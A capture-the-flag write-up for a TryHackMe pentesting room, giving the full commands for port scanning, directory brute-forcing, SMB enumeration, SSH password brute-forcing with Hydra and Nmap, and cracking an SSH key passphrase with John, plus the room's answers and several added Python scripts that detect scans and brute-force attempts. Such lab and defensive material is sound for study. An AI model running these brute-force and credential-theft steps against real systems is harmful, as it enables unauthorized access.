Basic Pentesting

Date: 09 March 2021

Author: Dhilip Sanjay S


Click Here to go to the TryHackMe room.

Learning Objectives

  • In this set of tasks you'll learn the following:

    • brute forcing (Hydra, Gobuster)

    • hash cracking (JohnTheRipper)

    • service enumeration (enum4linux)

    • Linux enumeration (LinPEAS)


Solutions

Find the services exposed by the machine

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 21:26 IST
Nmap scan report for 10.10.21.87
Host is up (0.17s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.07 seconds
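As an added example (not part of the original writeup), the following Python script parses Nmap's normal output, like the report above, and compares the open ports against an allow-list of services the host is expected to expose. The sample report and the ALLOWED_PORTS policy are constructed for the example; on this box the SMB, AJP and Tomcat ports would all show up as unexpected exposure to review.

```python
import re

# Constructed sample in Nmap's normal-output format, modelled on the scan above;
# this is test data, not a live scan result.
SAMPLE_NMAP = """\
Nmap scan report for 10.0.0.5
Host is up (0.17s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux
"""

# One port line: "<port>/<proto>  <state>  <service>  <version...>"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

# Hypothetical exposure policy for this host: the services it is allowed to expose.
ALLOWED_PORTS = {(22, "tcp"), (80, "tcp")}


def parse_nmap(text):
    """Return one dict per port line found in Nmap's normal output."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            entry = m.groupdict()
            entry["port"] = int(entry["port"])
            entry["version"] = entry["version"].strip()
            ports.append(entry)
    return ports


def unexpected_open_ports(ports, allowed=ALLOWED_PORTS):
    """Open ports the policy does not cover; each one is a finding to triage."""
    return [p for p in ports
            if p["state"] == "open" and (p["port"], p["proto"]) not in allowed]


if __name__ == "__main__":
    for p in unexpected_open_ports(parse_nmap(SAMPLE_NMAP)):
        print(f"{p['port']}/{p['proto']:<4} {p['service']:<12} {p['version']}")
```

Run it against a scan saved with nmap -oN scan.txt and feed the file's contents to parse_nmap; anything unexpected_open_ports returns is a service that needs either a business justification or a firewall rule.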

What is the name of the hidden directory on the web server?

  • Answer: development

  • Steps to Reproduce:

gobuster dir -u http://10.10.21.87 -t 100 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.21.87
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/03/09 21:33:48 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/development (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2021/03/09 21:33:57 Finished
===============================================================
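From the defender's side, a run like the one above is noisy: every wordlist entry that does not exist produces a 404 (or 403 for the dot-files) from one source within seconds, and gobuster identifies itself in its User-Agent by default, as its banner shows. The Python script below is an added example, not part of the original writeup; it parses Apache combined-format access log lines and flags sources that produce a burst of 4xx responses in a short window, with the User-Agent string as a secondary signal. The log lines are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed Apache combined-log lines resembling what a wordlist scan leaves
# behind (test data, not a capture from the room's target).
SAMPLE_ACCESS_LOG = """\
10.0.0.9 - - [09/Mar/2021:21:33:48 +0530] "GET /.hta HTTP/1.1" 403 277 "-" "gobuster/3.0.1"
10.0.0.9 - - [09/Mar/2021:21:33:48 +0530] "GET /.htaccess HTTP/1.1" 403 277 "-" "gobuster/3.0.1"
10.0.0.9 - - [09/Mar/2021:21:33:48 +0530] "GET /.htpasswd HTTP/1.1" 403 277 "-" "gobuster/3.0.1"
10.0.0.9 - - [09/Mar/2021:21:33:49 +0530] "GET /admin HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
10.0.0.9 - - [09/Mar/2021:21:33:49 +0530] "GET /backup HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
10.0.0.9 - - [09/Mar/2021:21:33:49 +0530] "GET /cgi-bin HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
10.0.0.9 - - [09/Mar/2021:21:33:50 +0530] "GET /development HTTP/1.1" 301 314 "-" "gobuster/3.0.1"
10.0.0.9 - - [09/Mar/2021:21:33:50 +0530] "GET /images HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
10.0.0.23 - - [09/Mar/2021:21:34:02 +0530] "GET /index.html HTTP/1.1" 200 11321 "-" "Mozilla/5.0"
10.0.0.23 - - [09/Mar/2021:21:34:05 +0530] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [ts] "request" status size "referer" "user-agent"
COMBINED_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_access_log(text):
    """Return one dict per well-formed combined-log line."""
    entries = []
    for line in text.splitlines():
        m = COMBINED_LINE.match(line)
        if m:
            e = m.groupdict()
            e["status"] = int(e["status"])
            e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
            entries.append(e)
    return entries


def detect_dir_bruteforce(text, window_seconds=10, threshold=5):
    """Return {ip: peak number of 4xx responses within one window} for sources
    that crossed the threshold. The error rate is the primary signal: a scanner
    can change its User-Agent, but it cannot avoid requesting paths that do not exist."""
    recent = defaultdict(deque)   # ip -> timestamps of 4xx responses inside the window
    flagged = {}
    for e in parse_access_log(text):
        if not 400 <= e["status"] < 500:
            continue
        q = recent[e["ip"]]
        q.append(e["ts"])
        while (e["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            flagged[e["ip"]] = max(flagged.get(e["ip"], 0), len(q))
    return flagged


def scanner_user_agents(text, markers=("gobuster", "dirb", "nikto", "ffuf")):
    """Weaker, secondary signal: sources that announce a scanning tool in their User-Agent."""
    return {e["ip"] for e in parse_access_log(text)
            if any(mk in e["ua"].lower() for mk in markers)}


if __name__ == "__main__":
    print("bursty 4xx sources:", detect_dir_bruteforce(SAMPLE_ACCESS_LOG))
    print("self-identified scanners:", scanner_user_agents(SAMPLE_ACCESS_LOG))
```

The 301 for /development is the one response in the burst that is not an error, which is exactly why rate-of-errors detection is useful: the scanner's hits are buried in its misses, so the misses are what you alert on.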

User brute-forcing to find the username & password

  1. Running enum4linux to enumerate SMB

enum4linux -a 10.10.21.87
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar  9 22:26:17 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.21.87
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =================================================== 
|    Enumerating Workgroup/Domain on 10.10.21.87    |
 =================================================== 
[+] Got domain/workgroup name: WORKGROUP

 =========================================== 
|    Nbtstat Information for 10.10.21.87    |
 =========================================== 
Looking up status of 10.10.21.87
	BASIC2          <00> -         B <ACTIVE>  Workstation Service
	BASIC2          <03> -         B <ACTIVE>  Messenger Service
	BASIC2          <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ==================================== 
|    Session Check on 10.10.21.87    |
 ==================================== 
[+] Server 10.10.21.87 allows sessions using username '', password ''

 ========================================== 
|    Getting domain SID for 10.10.21.87    |
 ========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Cant determine if host is part of domain or part of a workgroup

 ===================================== 
|    OS information on 10.10.21.87    |
 ===================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.21.87 from smbclient: 
[+] Got OS info for 10.10.21.87 from srvinfo:
	BASIC2         Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 ============================ 
|    Users on 10.10.21.87    |
 ============================ 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ======================================== 
|    Share Enumeration on 10.10.21.87    |
 ======================================== 

	Sharename       Type      Comment
	---------       ----      -------
	Anonymous       Disk      
	IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.21.87
//10.10.21.87/Anonymous	Mapping: OK, Listing: OK
//10.10.21.87/IPC$	[E] Cant understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 =================================================== 
|    Password Policy Information for 10.10.21.87    |
 =================================================== 


[+] Attaching to 10.10.21.87 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

	[+] BASIC2
	[+] Builtin

[+] Password Info for Domain: BASIC2

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: 37 days 6 hours 21 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ============================= 
|    Groups on 10.10.21.87    |
 ============================= 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ====================================================================== 
|    Users on 10.10.21.87 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-500 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-502 *unknown*\*unknown* (8)
..
S-1-5-21-2853212168-2008227510-3551253869-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
..
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
..
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

 ============================================ 
|    Getting printer info for 10.10.21.87    |
 ============================================ 
No printers returned.
  • We find two usernames: jan and kay.

  • We'll brute-force jan's password first.

  • The reason: a text file in the /development directory, written by K (kay), mentions that J's (jan's) password is easily crackable.
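What enum4linux reveals here is a set of SMB misconfigurations rather than one bug: the server accepts a null session, the Anonymous share is listable over it, the password policy is weak (minimum length 5, no complexity, no lockout threshold), and RID cycling over S-1-22-1 turns the local Unix accounts into a username list. The Python script below is an added example, not part of the original writeup or of enum4linux; it parses an enum4linux transcript and turns those observations into a findings list. The excerpt it runs on is constructed to mirror the output above, and the length baseline of 8 is an assumed policy value.

```python
import re

# Constructed excerpt in enum4linux's output format, modelled on the run above
# (test data, not captured from a live host).
SAMPLE_ENUM4LINUX = r"""
[+] Server 10.0.0.5 allows sessions using username '', password ''
//10.0.0.5/Anonymous    Mapping: OK, Listing: OK
//10.0.0.5/IPC$ [E] Cant understand response:
    [+] Minimum password length: 5
    [+] Password Complexity Flags: 000000
    [+] Account Lockout Threshold: None
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
"""

MIN_PASSWORD_LENGTH = 8   # assumed baseline; adjust to the organisation's policy


def triage_enum4linux(text):
    """Extract the hardening gaps and enumerated accounts from enum4linux output."""
    findings = []
    if re.search(r"allows sessions using username '', password ''", text):
        findings.append("null SMB session permitted (anonymous login works)")
    # Share-mapping lines: //host/share<ws>Mapping: OK, Listing: OK|DENIED
    for m in re.finditer(r"^//\S+/(\S+)\s+Mapping: OK, Listing: (\w+)", text, re.M):
        if m.group(2) == "OK":
            findings.append(f"share {m.group(1)} is listable over the null session")
    m = re.search(r"Minimum password length:\s*(\d+)", text)
    if m and int(m.group(1)) < MIN_PASSWORD_LENGTH:
        findings.append(f"minimum password length {m.group(1)} is below baseline {MIN_PASSWORD_LENGTH}")
    if re.search(r"Password Complexity Flags:\s*0+\s*$", text, re.M):
        findings.append("password complexity not enforced")
    if re.search(r"Account Lockout Threshold:\s*None", text):
        findings.append("no account lockout threshold")
    # RID-cycled local Unix accounts: S-1-22-1-<uid> Unix User\<name> (Local User)
    users = [(int(m.group(1)), m.group(2)) for m in
             re.finditer(r"^S-1-22-1-(\d+) Unix User\\(\S+) \(Local User\)", text, re.M)]
    if users:
        findings.append(f"{len(users)} local Unix accounts enumerable via RID cycling")
    return {"findings": findings, "unix_users": users}


if __name__ == "__main__":
    result = triage_enum4linux(SAMPLE_ENUM4LINUX)
    for f in result["findings"]:
        print("-", f)
    print("accounts:", [name for _, name in result["unix_users"]])
```

Each finding maps to a Samba setting to revisit: the null session and anonymous listing are governed by restrict anonymous and map to guest in smb.conf, and the policy values are what the server advertises through the same RPC interface enum4linux queries, so they are visible to anyone who can open that session.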

  2. Hydra:

    • Using Hydra to brute-force the username and password.

    • Example: hydra -L users.txt -P passwords.txt ssh://$ip -t 4

    • Options used and their explanations:

      • -L: read login names from a file

      • -l: a single login name

      • -P: read passwords from a file

      • ssh://$ip: the target host and protocol

      • -t: number of parallel tasks to run

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.21.87 -t 4 | tee hydra.out
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-09 22:14:13
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.21.87:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 28.00 tries/min, 84 tries in 00:03h, 14344315 to do in 8538:17h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
[STATUS] 28.07 tries/min, 421 tries in 00:15h, 14343978 to do in 8517:49h, 4 active
[22][ssh] host: 10.10.21.87   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-09 22:43:05
  3. Nmap's NSE ssh-brute script was faster than Hydra.

nmap 10.10.21.87 -p 22 --script ssh-brute --script-args userdb=user.txt,passdb=/usr/share/wordlists/rockyou.txt | tee ssh-brute.out

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 22:22 IST
NSE: [ssh-brute] Trying username/password pair: jan:jan
..
Nmap scan report for 10.10.21.87
Host is up (0.17s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-brute: 
|   Accounts: 
|     jan:armando - Valid credentials
|_  Statistics: Performed 781 guesses in 636 seconds, average tps: 1.7

Nmap done: 1 IP address (1 host up) scanned in 665.56 seconds
  4. You can also use msfconsole to brute-force the credentials.

  • We found jan's password: armando.
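The Hydra and ssh-brute runs above leave a distinctive trail on the target: hundreds of Failed password lines for the same account from one source, and then an Accepted password line from that same source once the wordlist hits. The Python script below is an added example, not part of the original writeup; it parses sshd entries in auth.log syslog format, flags sources that exceed a failure threshold inside a sliding window, and separately reports a successful login from a flagged source, which is the event worth paging on. The log excerpt is constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt in OpenSSH's syslog format (test data, not a real
# capture): a burst of failures from one source, one benign failure elsewhere,
# then a success from the source that was guessing.
SAMPLE_AUTH_LOG = """\
Mar  9 22:14:13 basic2 sshd[1201]: Failed password for jan from 10.0.0.9 port 51234 ssh2
Mar  9 22:14:15 basic2 sshd[1203]: Failed password for jan from 10.0.0.9 port 51236 ssh2
Mar  9 22:14:17 basic2 sshd[1205]: Failed password for jan from 10.0.0.9 port 51238 ssh2
Mar  9 22:14:19 basic2 sshd[1207]: Failed password for jan from 10.0.0.9 port 51240 ssh2
Mar  9 22:14:21 basic2 sshd[1209]: Failed password for invalid user admin from 10.0.0.9 port 51242 ssh2
Mar  9 22:14:23 basic2 sshd[1211]: Failed password for jan from 10.0.0.9 port 51244 ssh2
Mar  9 22:30:00 basic2 sshd[1400]: Failed password for kay from 10.0.0.23 port 40000 ssh2
Mar  9 22:30:05 basic2 sshd[1402]: Accepted publickey for kay from 10.0.0.23 port 40002 ssh2
Mar  9 22:43:04 basic2 sshd[1890]: Accepted password for jan from 10.0.0.9 port 52010 ssh2
"""

AUTH_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_auth_log(text):
    """Yield dicts for sshd Failed/Accepted lines; other lines are ignored."""
    for line in text.splitlines():
        m = AUTH_LINE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(e["ts"], "%b %d %H:%M:%S")  # syslog lines carry no year
            yield e


def analyze_auth_log(text, window_seconds=600, threshold=5):
    """Flag sources with >= threshold failures inside a sliding window, and any
    later successful login from a flagged source (a likely credential compromise)."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    total = defaultdict(int)      # ip -> all failures seen so far
    flagged = {}                  # ip -> peak failures seen within one window
    compromised = []              # (ip, user, failures before the success)
    for e in parse_auth_log(text):
        ip = e["ip"]
        if e["result"] == "Failed":
            total[ip] += 1
            q = recent[ip]
            q.append(e["ts"])
            while (e["ts"] - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), len(q))
        elif ip in flagged:
            compromised.append((ip, e["user"], total[ip]))
    return {"bruteforce_sources": flagged, "success_after_failures": compromised}


if __name__ == "__main__":
    report = analyze_auth_log(SAMPLE_AUTH_LOG)
    print("brute-force sources:", report["bruteforce_sources"])
    print("successful logins after a burst of failures:", report["success_after_failures"])
```

The single failure from 10.0.0.23 followed by a key-based login is the normal typo-then-retry pattern and is not reported. On the mitigation side, the threshold rule is what tools such as fail2ban apply to the live log, and with PasswordAuthentication no in sshd_config this whole phase of the attack stops working regardless of how weak jan's password is.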


What is the username?

  • Answer: jan


What is the password?

  • Answer: armando


What service do you use to access the server (answer in abbreviation in all caps)?

  • Answer: SSH


Enumerate the machine to find any vectors for privilege escalation

  • There is a password backup file, pass.bak, in kay's home directory, but jan has no read permission on it.

  • So we run linpeas.sh to look for possible privilege escalation vectors.

  • Download linpeas.sh (with wget, for example) into any directory where you have write permission.

jan@basic2:$ ./linpeas.sh
...
[+] Searching ssl/ssh files
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
Possible private SSH keys were found!
/home/kay/.ssh/id_rsa
 --> /etc/hosts.allow file found, read the rules:
/etc/hosts.allow
...

jan@basic2:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
.
.
.
-----END RSA PRIVATE KEY-----
  • From the linpeas output, we find that kay's SSH private key (/home/kay/.ssh/id_rsa) is readable by our user.

  • Copy the contents of the id_rsa file (the private key) to your local machine.

  • Try to log in using the private key.

    • -i flag: the identity (private key) file to use.

root@kali: ssh -i kay_id_rsa kay@10.10.21.87
Enter passphrase for key 'kay_id_rsa': 
  • It asks for the key's passphrase, which we don't have yet.


What is the name of the other user you found (all lower case)?

  • Answer: kay


If you have found another user, what can you do with this information?

  • Answer: We can try to escalate our privileges to gain root access. Maybe that user has additional permissions which can be exploited to gain root access.


What is the final password you obtain?

  • Answer: heresareallystrongpasswordthatfollowsthepasswordpolicy$$

  • Steps to Reproduce:

  • Now we'll try to brute-force the SSH key passphrase using John.

  • Convert the id_rsa file with ssh2john.py so that it can be fed to John for brute-forcing the passphrase.

root@kali: /usr/share/john/ssh2john.py kay_id_rsa > forjohn.txt
root@kali: john forjohn.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (kay_id_rsa)
Session completed
  • Log in using the SSH private key and provide the passphrase.

root@kali: ssh -i kay_id_rsa kay@10.10.21.87
Enter passphrase for key 'kay_id_rsa': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
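Two things made the escalation to kay possible: the private key was readable by another user, and it was protected only by legacy PEM encryption (the Proc-Type: 4,ENCRYPTED and DEK-Info headers), whose key derivation is a single MD5 pass over passphrase and salt. That is exactly what John's cost lines (MD5/AES, iteration count 1) report, and it is why rockyou.txt finished so quickly. The Python script below is an added example, not part of the original writeup or of linpeas or John; it audits a directory tree for private keys, flags ones readable by group or other, and classifies their protection as unencrypted, legacy PEM, or OpenSSH format (for which it reads the cipher and KDF names out of the openssh-key-v1 header). The key files it checks are constructed headers with no real key material; the usernames are taken from the room and bob is invented.

```python
import base64
import os
import re
import stat
import struct
import tempfile

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def classify_key(text):
    """Return (format, encrypted, kdf) for the contents of a private key file,
    or (None, None, None) if the text is not a private key."""
    if "-----BEGIN OPENSSH PRIVATE KEY-----" in text:
        body = "".join(l for l in text.splitlines() if not l.startswith("-----"))
        blob = base64.b64decode(body)
        if not blob.startswith(OPENSSH_MAGIC):
            return ("openssh", None, None)
        # After the magic come two length-prefixed strings: ciphername, kdfname.
        off, fields = len(OPENSSH_MAGIC), []
        for _ in range(2):
            (n,) = struct.unpack(">I", blob[off:off + 4])
            fields.append(blob[off + 4:off + 4 + n].decode())
            off += 4 + n
        cipher, kdf = fields
        return ("openssh", cipher != "none", kdf)
    if re.search(r"-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----", text):
        if "Proc-Type: 4,ENCRYPTED" in text and re.search(r"^DEK-Info:", text, re.M):
            # Legacy PEM: key derived by one MD5 pass over passphrase+salt (EVP_BytesToKey),
            # which is what John reports as "MD5/AES" with iteration count 1.
            return ("pem", True, "EVP_BytesToKey-MD5")
        return ("pem", False, None)
    return (None, None, None)


def audit_private_keys(root):
    """Walk root, find private keys, and report permission and passphrase weaknesses."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, errors="ignore") as f:
                    fmt, encrypted, kdf = classify_key(f.read())
            except (OSError, ValueError):
                continue
            if fmt is None:
                continue
            mode = stat.S_IMODE(os.stat(path).st_mode)
            issues = []
            if mode & 0o077:
                issues.append(f"mode {mode:04o} readable by group/other")
            if not encrypted:
                issues.append("no passphrase")
            elif fmt == "pem":
                issues.append("legacy PEM encryption (single-iteration MD5 KDF, cheap to brute-force offline)")
            findings.append({"path": os.path.relpath(path, root), "format": fmt,
                             "kdf": kdf, "issues": issues})
    return sorted(findings, key=lambda f: f["path"])


def openssh_armour(cipher, kdf):
    """Constructed openssh-key-v1 header (magic, cipher, kdf, empty kdfoptions,
    key count) in PEM armour; it contains no real key material."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    blob = OPENSSH_MAGIC + s(cipher) + s(kdf) + s(b"") + struct.pack(">I", 1)
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


def build_sample_tree(root):
    """Write constructed key files under root (headers only, no real keys)."""
    legacy = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
              "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
              "Q09OU1RSVUNURUQ=\n-----END RSA PRIVATE KEY-----\n")
    plain = "-----BEGIN RSA PRIVATE KEY-----\nQ09OU1RSVUNURUQ=\n-----END RSA PRIVATE KEY-----\n"
    samples = {
        "kay/.ssh/id_rsa": (legacy, 0o644),     # world-readable and legacy-encrypted, as in the room
        "bob/.ssh/id_rsa": (plain, 0o600),      # hypothetical user: private, but no passphrase
        "jan/.ssh/id_ed25519": (openssh_armour(b"aes256-ctr", b"bcrypt"), 0o600),  # the good case
        "jan/notes.txt": ("not a key\n", 0o644),
    }
    for rel, (content, mode) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(content)
        os.chmod(path, mode)


def run_demo():
    """Build the sample tree in a temporary directory and audit it."""
    root = tempfile.mkdtemp()
    build_sample_tree(root)
    return audit_private_keys(root)


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['path']:<22} {f['format']:<8} {f['kdf'] or '-':<20} {'; '.join(f['issues']) or 'ok'}")
```

Point audit_private_keys at /home on a real system. The fix for a key like kay's is to re-encrypt it in the OpenSSH format with a bcrypt KDF (ssh-keygen -p -o -a 100 -f id_rsa), choose a passphrase that is not in any wordlist, and keep the file at mode 0600; the bcrypt rounds make each offline guess far more expensive than the one-shot MD5 derivation that John was able to run through rockyou.txt.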
